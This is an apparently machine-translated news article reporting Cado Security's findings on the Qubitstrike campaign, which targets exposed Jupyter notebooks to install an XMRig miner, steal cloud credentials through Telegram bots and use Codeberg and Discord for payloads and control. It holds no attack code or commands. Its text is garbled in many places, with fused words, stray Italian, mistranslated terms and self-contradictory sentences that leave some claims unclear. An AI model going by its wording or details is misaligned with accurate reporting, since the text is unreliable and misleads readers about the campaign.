As reported by Cado Securitysome cybercriminals are spreading the malware Qubitstrike are notebook Jupyter. The attack apparently takes advantage of the cloud environment used by these devices, targeting them credentials and others sensitive information of the victims.
Attacks involving this malicious agent can also include the download of additional malware, which makes this campaign potentially very dangerous and difficult to stop. The priority of cybercriminals, however, apparently remains to install cryptominer on infected machines. Cado researchers have noticed that attackers use CSP credentials stolen to attach notebooks or e-mail di phishing specially created.
After successfully infiltrating, the malware establishes a connection with a remote C2 server to control the compromised system. Once this is done, attackers exploit notebooks’ ability to execute arbitrary code to execute one script di shell mi.sh malicious, disguised as a legitimate data analysis tool. This script retrieves/executes a mines XMRig and ensures that it runs every time the system is rebooted.
Qubitstrike and Jupyter notebooks: an unprecedented attack
As already mentioned, however, Qubitstrike is not limited to a simple operation cryptojacking. Attackers can also install backdoor additional and perform actual identity theft.
Since these are devices used for scientific research, cybercriminals can easily steal research data or alter them at will. Finally, any data theft occurs through special bots Telegram.
Qubitstrike campaign payloads are hosted on the hosting platform’s alternative service Git, codeberg.orge Discord it is used for command and control communications.
Cado Security researchers say this is the first time this specific platform has never been used for malware operations so far. Therefore, the operation linked to Qubitstrike may represent a worrying precedent for any future campaigns.